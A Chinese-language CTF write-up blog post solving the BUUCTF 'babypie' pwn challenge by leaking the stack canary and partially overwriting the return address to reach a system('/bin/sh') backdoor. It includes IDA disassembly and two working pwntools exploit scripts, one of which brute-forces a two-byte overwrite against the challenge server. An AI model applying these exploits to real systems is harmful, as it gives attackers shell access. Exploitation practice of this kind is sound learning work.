partial write bypass PIE

第一篇博客，请允许我水一下。BUUCTF上的一题：linkctf_2018.7_babypie

检查一下保护机制：

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

canary，pie，nx都开的栈，拖进IDA看看

__int64 sub_960()
{
  __int64 buf[6]; // [rsp+0h] [rbp-30h] BYREF

  buf[5] = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  buf[0] = 0LL;
  buf[1] = 0LL;
  buf[2] = 0LL;
  buf[3] = 0LL;
  puts("Input your Name:");
  read(0, buf, 0x30uLL);
  printf("Hello %s:\n", (const char *)buf);
  read(0, buf, 0x60uLL);
  return 0LL;
}

int sub_A3E()
{
  return system("/bin/sh");
}

.text:0000000000000960 sub_960         proc near               ; CODE XREF: main+14↓p
.text:0000000000000960
.text:0000000000000960 buf             = qword ptr -30h
.text:0000000000000960 var_28          = qword ptr -28h
.text:0000000000000960 var_20          = qword ptr -20h
.text:0000000000000960 var_18          = qword ptr -18h
.text:0000000000000960 var_8           = qword ptr -8
.text:0000000000000960
.text:0000000000000960 ; __unwind {
.text:0000000000000960                 push    rbp
.text:0000000000000961                 mov     rbp, rsp
.text:0000000000000964                 sub     rsp, 30h
.text:0000000000000968                 mov     rax, fs:28h
.text:0000000000000971                 mov     [rbp+var_8], rax
.text:0000000000000975                 xor     eax, eax
.text:0000000000000977                 mov     rax, cs:stdin
.text:000000000000097E                 mov     ecx, 0          ; n
.text:0000000000000983                 mov     edx, 2          ; modes
.text:0000000000000988                 mov     esi, 0          ; buf
.text:000000000000098D                 mov     rdi, rax        ; stream
.text:0000000000000990                 call    _setvbuf
.text:0000000000000995                 mov     rax, cs:__bss_start
.text:000000000000099C                 mov     ecx, 0          ; n
.text:00000000000009A1                 mov     edx, 2          ; modes
.text:00000000000009A6                 mov     esi, 0          ; buf
.text:00000000000009AB                 mov     rdi, rax        ; stream
.text:00000000000009AE                 call    _setvbuf
.text:00000000000009B3                 mov     [rbp+buf], 0
.text:00000000000009BB                 mov     [rbp+var_28], 0
.text:00000000000009C3                 mov     [rbp+var_20], 0
.text:00000000000009CB                 mov     [rbp+var_18], 0
.text:00000000000009D3                 lea     rdi, s          ; "Input your Name:"
.text:00000000000009DA                 call    _puts
.text:00000000000009DF                 lea     rax, [rbp+buf]
.text:00000000000009E3                 mov     edx, 30h ; '0'  ; nbytes
.text:00000000000009E8                 mov     rsi, rax        ; buf
.text:00000000000009EB                 mov     edi, 0          ; fd
.text:00000000000009F0                 call    _read
.text:00000000000009F5                 lea     rax, [rbp+buf]
.text:00000000000009F9                 mov     rsi, rax
.text:00000000000009FC                 lea     rdi, format     ; "Hello %s:\n"
.text:0000000000000A03                 mov     eax, 0
.text:0000000000000A08                 call    _printf
.text:0000000000000A0D                 lea     rax, [rbp+buf]
.text:0000000000000A11                 mov     edx, 60h ; '`'  ; nbytes
.text:0000000000000A16                 mov     rsi, rax        ; buf
.text:0000000000000A19                 mov     edi, 0          ; fd
.text:0000000000000A1E                 call    _read
.text:0000000000000A23                 mov     eax, 0
.text:0000000000000A28                 mov     rcx, [rbp+var_8]
.text:0000000000000A2C                 xor     rcx, fs:28h
.text:0000000000000A35                 jz      short locret_A3C
.text:0000000000000A37                 call    ___stack_chk_fail
.text:0000000000000A3C ; ---------------------------------------------------------------------------
.text:0000000000000A3C
.text:0000000000000A3C locret_A3C:                             ; CODE XREF: sub_960+D5↑j
.text:0000000000000A3C                 leave
.text:0000000000000A3D                 retn
.text:0000000000000A3D ; } // starts at 960
.text:0000000000000A3D sub_960         endp
.text:0000000000000A3D
.text:0000000000000A3E
.text:0000000000000A3E ; =============== S U B R O U T I N E =======================================
.text:0000000000000A3E
.text:0000000000000A3E ; Attributes: bp-based frame
.text:0000000000000A3E
.text:0000000000000A3E sub_A3E         proc near
.text:0000000000000A3E ; __unwind {
.text:0000000000000A3E                 push    rbp
.text:0000000000000A3F                 mov     rbp, rsp
.text:0000000000000A42                 lea     rdi, command    ; "/bin/sh"
.text:0000000000000A49                 call    _system
.text:0000000000000A4E                 nop
.text:0000000000000A4F                 pop     rbp
.text:0000000000000A50                 retn
.text:0000000000000A50 ; } // starts at A3E
.text:0000000000000A50 sub_A3E         endp

有个格式化字符串漏洞可以泄露canary，由于pie的开启，IDA里只显示后三位，发现后门函数地址后三位是 A3E ，和用gdb调出来的返回地址 A6A 只相差最后一个字节，由于小端序存储，我们可以直接部分字节写入，改返回地址为后门函数，即可getshell。以下附上exp：

from pwn import *

def pwn():
    s =remote('node4.buuoj.cn',27982)
    s.recvuntil(b'Input your Name:\n')
    s.sendline(b'a'*0x28)
    s.recvuntil(b'a'*0x28)
    canary=u64(s.recv(8))-0xa
    success(hex(canary))

    payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e'
    s.recvuntil(b':\n')
    s.send(payload)
    s.interactive()
pwn()

当然有兴趣的师傅也可以试看看写入双字节，爆破看看，有1/16的概率getshell。

exp:

from pwn import *

def pwn():
  s.recvuntil(b'Input your Name:\n')
  s.sendline(b'a'*0x28)
  s.recvuntil(b'a'*0x28)
  canary=u64(s.recv(8))-0xa
  success(hex(canary))

  payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e\xaa'
  s.recvuntil(b':\n')
  s.send(payload)
  s.sendline(b'ls')
  k=s.recv()
  return k


if __name__ == '__main__':
  while True:
    s =remote('node4.buuoj.cn',26877)
    k=pwn()
    if(b'bin' in k):
      s.interactive()
      break
    s.close()

 

最后感谢winmt师傅的爆破指导。